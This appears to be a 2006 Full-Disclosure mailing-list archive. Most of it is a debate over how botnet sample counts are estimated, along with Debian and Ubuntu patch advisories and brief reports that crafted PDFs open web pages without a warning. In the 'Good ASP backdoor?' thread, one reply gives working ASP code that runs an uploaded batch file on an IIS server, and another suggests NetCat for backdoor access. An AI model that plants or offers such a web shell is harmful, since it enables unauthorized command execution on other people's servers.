Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

[Dude VanWinkle]

On 9/15/06, Richard Golodner <[EMAIL PROTECTED]> wrote:
> As we had seen today everybody has an opinion about how the Botnet
> metrics are computed. I have been reading Gadi's post for many years now and
> believe he is a very knowledgeable and competent person. Give the guy a
> break, he has supplied us with very useful and interesting facts on Botnets
> and that is a lot more than I see coming from all the rest of the group
> involved in this thread.
> Where is everyone else's data?\

I have data collected over 5 class B's via darknet.


Of course they are all 10.1.x.x, with only 1 virtual host per /16.
Seems lke I am guessing.

Not that I dont trust G, just wanted to see if I could goad him into
releasing some data (as has been called for)

-JP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

[Richard Golodner]

As we had seen today everybody has an opinion about how the Botnet
metrics are computed. I have been reading Gadi's post for many years now and
believe he is a very knowledgeable and competent person. Give the guy a
break, he has supplied us with very useful and interesting facts on Botnets
and that is a lot more than I see coming from all the rest of the group
involved in this thread. 
Where is everyone else's data?
Richard Golodner

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1160-2] New Mozilla packages fix several vulnerabilities

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1160-2[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
September 15th, 2006http://www.debian.org/security/faq
- --

Package: mozilla
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs: CVE-2006-2779 CVE-2006-3805 CVE-2006-3806 CVE-2006-3807
 CVE-2006-3808 CVE-2006-3809 CVE-2006-3810
CERT advisories: VU#466673 VU#655892 VU#687396 VU#876420 VU#911004
BugTraq IDs: 18228 19181

The latest security updates of Mozilla introduced a regression that
led to a disfunctional attachment panel which warrants a correction to
fix this issue.  For reference please find below the original advisory
text:

  Several security related problems have been discovered in Mozilla and
  derived products.  The Common Vulnerabilities and Exposures project
  identifies the following vulnerabilities:

  CVE-2006-2779

  Mozilla team members discovered several crashes during testing of
  the browser engine showing evidence of memory corruption which may
  also lead to the execution of arbitrary code.  The last bit of
  this problem will be corrected with the next update.  You can
  prevent any trouble by disabling Javascript.  [MFSA-2006-32]

  CVE-2006-3805

  The Javascript engine might allow remote attackers to execute
  arbitrary code.  [MFSA-2006-50]

  CVE-2006-3806

  Multiple integer overflows in the Javascript engine might allow
  remote attackers to execute arbitrary code.  [MFSA-2006-50]

  CVE-2006-3807

  Specially crafted Javascript allows remote attackers to execute
  arbitrary code.  [MFSA-2006-51]

  CVE-2006-3808

  Remote AutoConfig (PAC) servers could execute code with elevated
  privileges via a specially crafted PAC script.  [MFSA-2006-52]

  CVE-2006-3809

  Scripts with the UniversalBrowserRead privilege could gain
  UniversalXPConnect privileges and possibly execute code or obtain
  sensitive data.  [MFSA-2006-53]

  CVE-2006-3810

  A cross-site scripting vulnerability allows remote attackers to
  inject arbitrary web script or HTML.  [MFSA-2006-54]

For the stable distribution (sarge) these problems have been fixed in
version 1.7.8-1sarge7.2.2.

For the unstable distribution (sid) these problems won't be fixed
since its end of lifetime has been reached and the package will soon
be removed.

We recommend that you upgrade your mozilla package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge7.2.2.dsc
  Size/MD5 checksum: 1131 bb39933b4dcb63f6f986f0da3ab9461e

http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge7.2.2.diff.gz
  Size/MD5 checksum:   532293 5a86930497b980b25e7f8e5cd6305ad0

http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8.orig.tar.gz
  Size/MD5 checksum: 30589520 13c0f0331617748426679e8f2e9f537a

  Alpha architecture:


http://security.debian.org/pool/updates/main/m/mozilla/libnspr-dev_1.7.8-1sarge7.2.2_alpha.deb
  Size/MD5 checksum:   168074 553ba25202552c16c02cfdcf94bbc1c4

http://security.debian.org/pool/updates/main/m/mozilla/libnspr4_1.7.8-1sarge7.2.2_alpha.deb
  Size/MD5 checksum:   147582 e953bc1da64aaab9b50ef2bd357279b8

http://security.debian.org/pool/updates/main/m/mozilla/libnss-dev_1.7.8-1sarge7.2.2_alpha.deb
  Size/MD5 checksum:   184944 18bfed4502c3e8a50cac55bd69cf6f20

http://security.debian.org/pool/updates/main/m/mozilla/libnss3_1.7.8-1sarge7.2.2_alpha.deb
  Size/MD5 checksum:   857148 c9f560d4ad706a1e50dbd2db21978427

http://security.debian.org/pool/updates/main/m/mozilla/mozilla_1.7.8-1sarge7.2.2_alpha.deb
  Size/MD5 checksum: 1042 9de55ee42dcc1c484a801623ac29c80d

http://security.debian.org/pool/updates/main/m/mozilla/mozilla-browser_1.7.8-1sarge7.2.2_alpha.deb
  Size/MD5 checksum: 11484766 4b31f8553a2ee93057858b35cdc522d9

http://security.debian.org/pool/updates/main/m/mozilla/mozilla-calendar_1.7.8-1sarge7.2.2_alpha.deb
  Size/MD5 checksum:   403274 da75d1e0207b660ae42d7d1eb0b99617

http://security.debian.org/pool/updates/m

Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

[Peter Dawson]

I cant' present data, but I'll opinion that Gadi is pretty much on track with figures and numbers. In fact his stat's are on the lower side
 
our current intel reports indicates overall incidents by " Zombie machines on organization's network/ bots/use of network by BotNets" = 20%.  which is ANY NET based data sets for incident mngt. 

 
this indiates a 36% increase from July 2004 - June 2005  with a mean "unknown base" being equated to 
15.1%. This pecent implies the rate of fresh nodes being propagated, or rather the rate of growth  for Botnets!! 
 
hypothecially, you can if flatline these  stats against  whatever date sets you have ...I'll leave you all to you better judgements :)-

 
/pd
On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
On Thu, 14 Sep 2006, Dude VanWinkle wrote:> On 9/14/06, Gadi Evron <
[EMAIL PROTECTED]> wrote:> > This counts bot samples. Whether they are variants (changed) or> > insignificant changes such as only the IP address to the C&C, they are> > counted as unique.
>> So if you have multiple machines NAT'ed under one IP, that is one pot.> err bot eh? OK.And if I see 10 bots usingthe same address on a dynamic range.. ever heardof DHCP? The number crunching schemes arenever perfect but they are pretty
good.I count, much like many others, unique IPs. A bot is defined as aninstance of an installed Trojan horse. One machine mayhave (and probablydoes have) several. We can count IPs and we do.3.5
 Million hosts, note, for spam alone. The total population count ismind-boggling. I believe spamhaus has it pinned at 3.2 millions, otherhave higher numbers. That's about where it is for EMAIL based spam, perday.
>> >> > This is why we now run different sharing projects between established> > honey nets.>> So you dont count botnets that detect honeynets eh?>Honey pot detection is an interesting field, I am familiar with it and
even consider myself somewhat of a knowledgable person on it, but thereare those who research it actively.As interesting as it may be, it's not much of a field yet, sorry tosay. Honey pots of different kinds work marvelously.
Not all our sources for samples are the same. It would be silly of me todivulge them all (especially as personally I have no use for samples thesedays and others do). Still, we can only report what we see, what do you
see?> > > or other trivial changes?  Do you attempt to correct for complex polymorphic> > > variants?>> Nah, just contributors who dont all have publicly routable IP's and
> this herders that know about VMware/Honeywall>>> > There aren't many of those.. really. :)>> Really? Ok.>> > > > Further, the anti virus world sees about the same numbers.
>> Using the same methods?>And their reporting user-base, alliances and sharing artners, and whatnot. Yes. D o you think all bots are extremely smart rootkits? I amquite happy to say most botnets are nothing if not the re-use of old code,
which is freely available, using the same old methods.There are other types of malware out there.> > > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of> > > > 15K avg bot samples a month, as well.
>> Gotcha, you MS and Symantec share numbers based of who doesnt know how> to disable your detection methodsYou assume too much Dude.Still, you are right, 100%. I can only detect what I know how to
detect. But samples are not the only way to follow botnets, and there aremany ends on how to approach one problems.Cryptic? I suppose, but hey, Google for methods, see what you find, andtell me what you think. I believe we have pretty good coverage, but I also
need to admit most anti viruses do not cover bot detection very well.> I am just saying, the larger the organization, the sharper the focus> from the other side. Maybe a loose coalition of known non-bullshitters
> would have a more accurate picture.The picture you got is pretty accurate. Don't take my word for itthough. I am happy to examine and share (as much as I can, which is morethan enough to show the numbers (lower numbers) we chose to show in the
article.What numbers do you need? What makes you doubt what we have given? I'd bemore than happy to answer any question you have or counter-numbers youhave, but your love for me is as irrelevant as you calling me a
*** when you don't show your own data or challange mine withactual questions like Dave (the other dave) did.Thanks,   Gadi.> still love ja tho Gadi,>> -JP
>> > >> > >   Got a link/quote/reference to that?  Does Ziv explain the methodology that> > > they are using?> >> > Nope, but I will ask. Most of the numbers I get are at 15K. I can only
> > prove *on my own* without relying on other sources, as reliable as they> > may be, 12K, which is the number we mentioned in the article. We were> > being conservative due to that reason, but the number is higher.
> >> > > > I don't know what others may be seeing, but this is our best estimate> > > > as to what's going on with the number of unique samples released> > > > every mont

[Full-disclosure] Re: Backdooring PDF Files

[fit happy]

It is really take effect in my virtual machine:
xp sp2+pdf reader version 7.0.1.2005030700
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

[Gadi Evron]

On Thu, 14 Sep 2006, Dude VanWinkle wrote:
> On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> > This counts bot samples. Whether they are variants (changed) or
> > insignificant changes such as only the IP address to the C&C, they are
> > counted as unique.
> 
> So if you have multiple machines NAT'ed under one IP, that is one pot.
> err bot eh? OK.

And if I see 10 bots usingthe same address on a dynamic range.. ever heard
of DHCP? The number crunching schemes arenever perfect but they are pretty
good.

I count, much like many others, unique IPs. A bot is defined as an
instance of an installed Trojan horse. One machine mayhave (and probably
does have) several. We can count IPs and we do.

3.5 Million hosts, note, for spam alone. The total population count is
mind-boggling. I believe spamhaus has it pinned at 3.2 millions, other
have higher numbers. That's about where it is for EMAIL based spam, per
day.

> 
> >
> > This is why we now run different sharing projects between established
> > honey nets.
> 
> So you dont count botnets that detect honeynets eh?
> 

Honey pot detection is an interesting field, I am familiar with it and
even consider myself somewhat of a knowledgable person on it, but there
are those who research it actively.

As interesting as it may be, it's not much of a field yet, sorry to
say. Honey pots of different kinds work marvelously.

Not all our sources for samples are the same. It would be silly of me to
divulge them all (especially as personally I have no use for samples these
days and others do). Still, we can only report what we see, what do you
see?

> > > or other trivial changes?  Do you attempt to correct for complex 
> > > polymorphic
> > > variants?
> 
> Nah, just contributors who dont all have publicly routable IP's and
> this herders that know about VMware/Honeywall
> 
> 
> > There aren't many of those.. really. :)
> 
> Really? Ok.
> 
> > > > Further, the anti virus world sees about the same numbers.
> 
> Using the same methods?
> 

And their reporting user-base, alliances and sharing artners, and what
not. Yes. D o you think all bots are extremely smart rootkits? I am
quite happy to say most botnets are nothing if not the re-use of old code,
which is freely available, using the same old methods.

There are other types of malware out there.

> > > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> > > > 15K avg bot samples a month, as well.
> 
> Gotcha, you MS and Symantec share numbers based of who doesnt know how
> to disable your detection methods

You assume too much Dude.
Still, you are right, 100%. I can only detect what I know how to
detect. But samples are not the only way to follow botnets, and there are
many ends on how to approach one problems.

Cryptic? I suppose, but hey, Google for methods, see what you find, and
tell me what you think. I believe we have pretty good coverage, but I also
need to admit most anti viruses do not cover bot detection very well.

> I am just saying, the larger the organization, the sharper the focus
> from the other side. Maybe a loose coalition of known non-bullshitters
> would have a more accurate picture.

The picture you got is pretty accurate. Don't take my word for it
though. I am happy to examine and share (as much as I can, which is more
than enough to show the numbers (lower numbers) we chose to show in the
article.

What numbers do you need? What makes you doubt what we have given? I'd be
more than happy to answer any question you have or counter-numbers you
have, but your love for me is as irrelevant as you calling me a
*** when you don't show your own data or challange mine with
actual questions like Dave (the other dave) did.

Thanks,

Gadi.

> still love ja tho Gadi,
> 
> -JP
> 
> > >
> > >   Got a link/quote/reference to that?  Does Ziv explain the methodology 
> > > that
> > > they are using?
> >
> > Nope, but I will ask. Most of the numbers I get are at 15K. I can only
> > prove *on my own* without relying on other sources, as reliable as they
> > may be, 12K, which is the number we mentioned in the article. We were
> > being conservative due to that reason, but the number is higher.
> >
> > > > I don't know what others may be seeing, but this is our best estimate
> > > > as to what's going on with the number of unique samples released
> > > > every month.
> > > >
> > > > Jose Nazarijo from Arbor replied on the botnets list that he sees
> > > > similar numbers.
> > > >
> > > > I hope this helps... what are you looking to hear?
> > >
> > >   Some kind of explanation for the huge disjunction between these numbers
> > > and our instinctive ideas about what's possible.  Of course, being
> >
> > I followed you this far, but to be honest, your ideas (what are
> > they?) are indeed very far from reality... :)
> >
> > > un-worked-out intuitive estimates, such ideas are of course entirely 
> > > likely
> > > to be off the mark, but off the mark by two orders of magnitude?  Hence

Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

[Dude VanWinkle]

On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> This counts bot samples. Whether they are variants (changed) or
> insignificant changes such as only the IP address to the C&C, they are
> counted as unique.

So if you have multiple machines NAT'ed under one IP, that is one pot.
err bot eh? OK.

>
> This is why we now run different sharing projects between established
> honey nets.

So you dont count botnets that detect honeynets eh?

> > or other trivial changes?  Do you attempt to correct for complex polymorphic
> > variants?

Nah, just contributors who dont all have publicly routable IP's and
this herders that know about VMware/Honeywall


> There aren't many of those.. really. :)

Really? Ok.

> > > Further, the anti virus world sees about the same numbers.

Using the same methods?

> > > The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> > > 15K avg bot samples a month, as well.

Gotcha, you MS and Symantec share numbers based of who doesnt know how
to disable your detection methods

I am just saying, the larger the organization, the sharper the focus
from the other side. Maybe a loose coalition of known non-bullshitters
would have a more accurate picture.

still love ja tho Gadi,

-JP

> >
> >   Got a link/quote/reference to that?  Does Ziv explain the methodology that
> > they are using?
>
> Nope, but I will ask. Most of the numbers I get are at 15K. I can only
> prove *on my own* without relying on other sources, as reliable as they
> may be, 12K, which is the number we mentioned in the article. We were
> being conservative due to that reason, but the number is higher.
>
> > > I don't know what others may be seeing, but this is our best estimate
> > > as to what's going on with the number of unique samples released
> > > every month.
> > >
> > > Jose Nazarijo from Arbor replied on the botnets list that he sees
> > > similar numbers.
> > >
> > > I hope this helps... what are you looking to hear?
> >
> >   Some kind of explanation for the huge disjunction between these numbers
> > and our instinctive ideas about what's possible.  Of course, being
>
> I followed you this far, but to be honest, your ideas (what are
> they?) are indeed very far from reality... :)
>
> > un-worked-out intuitive estimates, such ideas are of course entirely likely
> > to be off the mark, but off the mark by two orders of magnitude?  Hence the
> > request for more methodological details.
>
> No problem, I quite understand. There is not that much science into it
> really:
> "Yo, how many unique samples do you see?" as a lone dataset if they won't
> share.
> "Yo, how many unique samples do we all see?" if they share.
> "Yo, how many unique samples do others see?"
>
> AVG is 15K, I can prove *on my own* 12K... counting banking/phishing
> trojan horses, general purpose trojans, dialers, etc (from the large bot
> families).
>
> Gadi.
>
>
> >
> > cheers,
> >   DaveK
> > --
> > Can't think of a witty .sigline today
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> > ___
> > To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> > All list and server information are public and available to law enforcement 
> > upon request.
> > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

[Dude VanWinkle]

On 9/14/06, Jose Nazario <[EMAIL PROTECTED]> wrote:
> i guess i'm curious about your position, then, and what you're meaning by
> "our instinctive ideas about what's possible".


You see, the universe operates with a distinct prejudice towards
individuals with an inclination towards lunacy...

they should have covered this in douchebaggery 101 f'er cryin' out loud!

-JP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Good ASP backdoor?

[c0ntex]

Nothing spiffing but it works,

<%@ Page language="VB" Debug="true" aspcompat="true" %>
<%
shell("C:\Program Files\WebApp\Uploads\owned.bat")
%>

   Sub blah()
   Dim SpawnShell = server.CreateObject("WScript.Shell")
   SpawnShell.Run("C:\Program Files\WebApp\Uploads\owned.bat")
   End sub



then just upload your tools and run via the bat file.  Does the job.


On 14/09/06, Jason Miller <[EMAIL PROTECTED]> wrote:
> http://replica-solutions.de/
> has some php based ones, check it out
>
> On 9/14/06, Exibar < [EMAIL PROTECTED]> wrote:
> > NetCat is a tried and true favorite
> >
> >
> > - Original Message -
> > From: "Lachniet, Mark" <[EMAIL PROTECTED]>
> > To: 
> > Sent: Thursday, September 14, 2006 2:44 PM
> > Subject: [Full-disclosure] Good ASP backdoor?
> >
> >
> > > Can anyone suggest a good backdoor for placing on a IIS server when you
> > > can upload a file to document root?  For exapmle an all-in-one tool with
> > > upload, download, command execution, etc.  There are several basic ones
> > > out there - I was wondering if anyone ever wrote a really spiffy one.
> > >
> > > Thanks in advance,
> > >
> > > Mark Lachniet
> > >
> > > ___
> > > Full-Disclosure - We believe in it.
> > > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> > >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


-- 

regards
c0ntex

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Good ASP backdoor?

[Jason Miller]

http://replica-solutions.de/has some php based ones, check it outOn 9/14/06, Exibar <
[EMAIL PROTECTED]> wrote:NetCat is a tried and true favorite- Original Message -
From: "Lachniet, Mark" <[EMAIL PROTECTED]>To: 
Sent: Thursday, September 14, 2006 2:44 PMSubject: [Full-disclosure] Good ASP backdoor?> Can anyone suggest a good backdoor for placing on a IIS server when you> can upload a file to document root?  For exapmle an all-in-one tool with
> upload, download, command execution, etc.  There are several basic ones> out there - I was wondering if anyone ever wrote a really spiffy one.>> Thanks in advance,>> Mark Lachniet
>> ___> Full-Disclosure - We believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/>>___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

[Jose Nazario]

On Thu, 14 Sep 2006, Dave "No, not that one" Korn wrote:

> Can you go into detail about the methodology you're using here?  How do 
> you "get to a number" of 15,000 from a number "between 200 and 800"? 
> Is this a statistical extrapolation, or are you saying that your 
> honeynet gets 200 to 800 unique samples a month, and so does that one 
> over there, and that one, and that one and they all add up to 15000? 
> Do you attempt to correct for variants that are simply re-packed using a 
> different compressor, or other trivial changes?  Do you attempt to 
> correct for complex polymorphic variants?

my numbers are based on unique MD5 values.

the bulk of those are minor variants on a theme, ie repackaged bots or 
reconfigured bots, maybe a new module thrown in or something. only a small 
handful, maybe a dozen or so, are really new bots every month. very rarely 
do we see new bots or new capabilities added. the last major change was 
the use of the MS06-040 netapi exploit.

the bulk of the bot binaries i see are derivatives of well known families. 
very few new families emerge in any given timeframe, but in the HTTP bot
world, we're starting to see people develop tools and reuse them.

unique bot samples, ~12-15k or higher a month. many independent teams can 
back that ballpark figure up. new bot samples, truly new like i outlined 
above, is far less. about three orders of magnitude less.

by the way, in this day and age the bulk of people do not bother with 
polymorphism. they achieve it not through the classic - and elegant - 
methods of self modifying code but instead by churning out new bots fast 
and furious. same end result, though: confuse the naive, static detection 
tools out thare.

> Some kind of explanation for the huge disjunction between these numbers 
> and our instinctive ideas about what's possible.  Of course, being 
> un-worked-out intuitive estimates, such ideas are of course entirely 
> likely to be off the mark, but off the mark by two orders of magnitude? 
> Hence the request for more methodological details.

i guess i'm curious about your position, then, and what you're meaning by 
"our instinctive ideas about what's possible".

it sounds like we're on the same page, but you may feel it's hyping the 
problem to talk about new bots based on unique MD5 values. it's not my 
favorite way of thinking about it, but it is easily underscored by a 
real-world fact: many AV vendors fail to detect the same bot source simply 
repackaged or re-configured (ie a new IRC server, everything else the 
same). hence, each new MD5 means a new detection hit for them. so, hype 
has a real-world backing, namely AV detection issues.


jose nazario, ph.d. [EMAIL PROTECTED]
http://monkey.org/~jose/http://monkey.org/~jose/secnews.html
http://www.wormblog.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [botnets] the world of botnets article and wrong numbers

[Gadi Evron]

On Thu, 14 Sep 2006, Dave "No, not that one" Korn wrote:
>   Can you go into detail about the methodology you're using here?  How do 
> you "get to a number" of 15,000 from a number "between 200 and 800"?  Is 

My comment here was in regard to what most honey nets see.

> this a statistical extrapolation, or are you saying that your honeynet gets 
> 200 to 800 unique samples a month, and so does that one over there, and that 
> one, and that one and they all add up to 15000?  Do you attempt to 

Yes. Also, some are large enough to get to that number, and there are
other sources as well such as the AV community or the Microsoft data... as
examples.

> correct for variants that are simply re-packed using a different compressor, 

This counts bot samples. Whether they are variants (changed) or
insignificant changes such as only the IP address to the C&C, they are
counted as unique.

This is why we now run different sharing projects between established
honey nets.

> or other trivial changes?  Do you attempt to correct for complex polymorphic 
> variants?

There aren't many of those.. really. :)


> > Further, the anti virus world sees about the same numbers.
> >
> > The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> > 15K avg bot samples a month, as well.
> 
>   Got a link/quote/reference to that?  Does Ziv explain the methodology that 
> they are using?

Nope, but I will ask. Most of the numbers I get are at 15K. I can only
prove *on my own* without relying on other sources, as reliable as they
may be, 12K, which is the number we mentioned in the article. We were
being conservative due to that reason, but the number is higher.

> > I don't know what others may be seeing, but this is our best estimate
> > as to what's going on with the number of unique samples released
> > every month.
> >
> > Jose Nazarijo from Arbor replied on the botnets list that he sees
> > similar numbers.
> >
> > I hope this helps... what are you looking to hear?
> 
>   Some kind of explanation for the huge disjunction between these numbers 
> and our instinctive ideas about what's possible.  Of course, being 

I followed you this far, but to be honest, your ideas (what are
they?) are indeed very far from reality... :)

> un-worked-out intuitive estimates, such ideas are of course entirely likely 
> to be off the mark, but off the mark by two orders of magnitude?  Hence the 
> request for more methodological details.

No problem, I quite understand. There is not that much science into it
really:
"Yo, how many unique samples do you see?" as a lone dataset if they won't
share.
"Yo, how many unique samples do we all see?" if they share.
"Yo, how many unique samples do others see?"

AVG is 15K, I can prove *on my own* 12K... counting banking/phishing
trojan horses, general purpose trojans, dialers, etc (from the large bot
families).

Gadi.


> 
> cheers,
>   DaveK
> -- 
> Can't think of a witty .sigline today 
> 
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ___
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> All list and server information are public and available to law enforcement 
> upon request.
> http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Backdooring PDF Files

[Stan Bubrouski]

On 9/14/06, Hugo Francisco González Robledo <[EMAIL PROTECTED]> wrote:
> I think it depends on the context.
>
> Example 1 (backdoored1.pdf) :
>
> On Ubuntu Linux with Adobe Reader 7.0.1 opens the web page on
> mozilla-firefox whitout warning.
>

On FC5 with Acrobat Reader 7.0.8 it opens the page in firefox without
warning as well.

-sb

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] AFS - The Ultimate Sulution?

[Paul Sebastian Ziegler]

Hi list,

recently I found myself in an argument which I found interesting. This
is why I want to pass it on to the list since neither me nor my friend
were able to agree on this. Maybe the broader knowledge of this list
will lighten up the matter a bit. Apart from this I think it might
interest many of you.

Core of the discussion is a corporate system with several workstations
all attached to a single network. This network runs an AFS-server which
is supplying the corporation's AFS-cell.
Every workstation boots into a minimal environment which ask for
username and password. Afterwards it uses these to connect to the
AFS-Cell and boots one of several available System-Images which reside
on the AFS-Server. (Both Linux (FC1) and Windows (2000) Images are
available). After booting the OS several important folders and files are
replaced with the user's own data (which only he can access due to
Kerberos authentication). For instance the Linux image gets /etc/passwd,
/etc/shadow, /home/$USER and some others replaced. The custom
/etc/passwd and /etc/shadow will only contain the user himself and the
root-account in order to prevent bruteforcing the passwords.

It seems like this system is quite secure. Even if an attacker should
gain root-access locally he would not be able to access anything he
didn't own in the first place. (So to say other user's files residing in
their private AFS folders.) Also he could cause no destruction to the
system because the system is booted from the same Image every time. Even
if he did something like rm -rf / he would only delete his private files
in the home-folder.

This is kind of a combination of RemoteBoot and AFS.

The well known weakness of RemoteBoot is that - set the case the
communication between the image-server is not encrypted - it is possible
to supply forged images to the workstation. (E.g. by ARP-Spoofing the
image-server.)
AFS however uses Kerberos to authenticate and thus is considered secure.

Now my friend claims that this system could go unmanaged for ages since
the user's data would remain secure even if security holes were
published and exploits released. This seems true.
However I kind of refuse to believe that something this simple can truly
be secure.

The only hole I could come up with is that there would be a remote
vulnerability which an attacker would use to access the running
workstation of somebody else.
However this seems unlikely and quite lame.

Anyone up for anything more sophisticated?

Thanks in advance and happy arguing.

Paul

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Good ASP backdoor?

[Exibar]

NetCat is a tried and true favorite


- Original Message - 
From: "Lachniet, Mark" <[EMAIL PROTECTED]>
To: 
Sent: Thursday, September 14, 2006 2:44 PM
Subject: [Full-disclosure] Good ASP backdoor?


> Can anyone suggest a good backdoor for placing on a IIS server when you
> can upload a file to document root?  For exapmle an all-in-one tool with
> upload, download, command execution, etc.  There are several basic ones
> out there - I was wondering if anyone ever wrote a really spiffy one.
> 
> Thanks in advance,
> 
> Mark Lachniet
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-346-2] Fixed linux-restricted-modules-2.6.15 for previous Linux kernel update

[Martin Pitt]

=== 
Ubuntu Security Notice USN-346-2 September 14, 2006
linux-restricted-modules-2.6.15 regression fix
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  avm-fritz-firmware-2.6.15-26  2.6.15.11-4
  avm-fritz-kernel-source   2.6.15.11-4
  fglrx-control 2.6.15.11-4
  fglrx-kernel-source   2.6.15.11-4
  linux-restricted-modules-2.6.15-26-3862.6.15.11-4
  linux-restricted-modules-2.6.15-26-6862.6.15.11-4
  linux-restricted-modules-2.6.15-26-amd64-generic  2.6.15.11-4
  linux-restricted-modules-2.6.15-26-amd64-k8   2.6.15.11-4
  linux-restricted-modules-2.6.15-26-amd64-xeon 2.6.15.11-4
  nic-restricted-firmware-2.6.15-26-386-di  2.6.15.11-4
  nic-restricted-firmware-2.6.15-26-amd64-generic-di2.6.15.11-4
  nic-restricted-modules-2.6.15-26-386-di   2.6.15.11-4
  nic-restricted-modules-2.6.15-26-amd64-generic-di 2.6.15.11-4
  nvidia-glx2.6.15.11-4
  nvidia-glx-dev2.6.15.11-4
  nvidia-glx-legacy 2.6.15.11-4
  nvidia-glx-legacy-dev 2.6.15.11-4
  nvidia-kernel-source  2.6.15.11-4
  nvidia-legacy-kernel-source   2.6.15.11-4
  xorg-driver-fglrx 2.6.15.11-4
  xorg-driver-fglrx-dev 2.6.15.11-4

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

USN-346-1 provided an updated Linux kernel to fix several security
vulnerabilities. Unfortunately the update broke the binary 'nvidia'
driver from linux-restricted-modules. This update corrects this
problem. We apologize for the inconvenience.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.11-4.diff.gz
  Size/MD5:87151 643e82286c057ba22dc6e206eb35bb29

http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.11-4.dsc
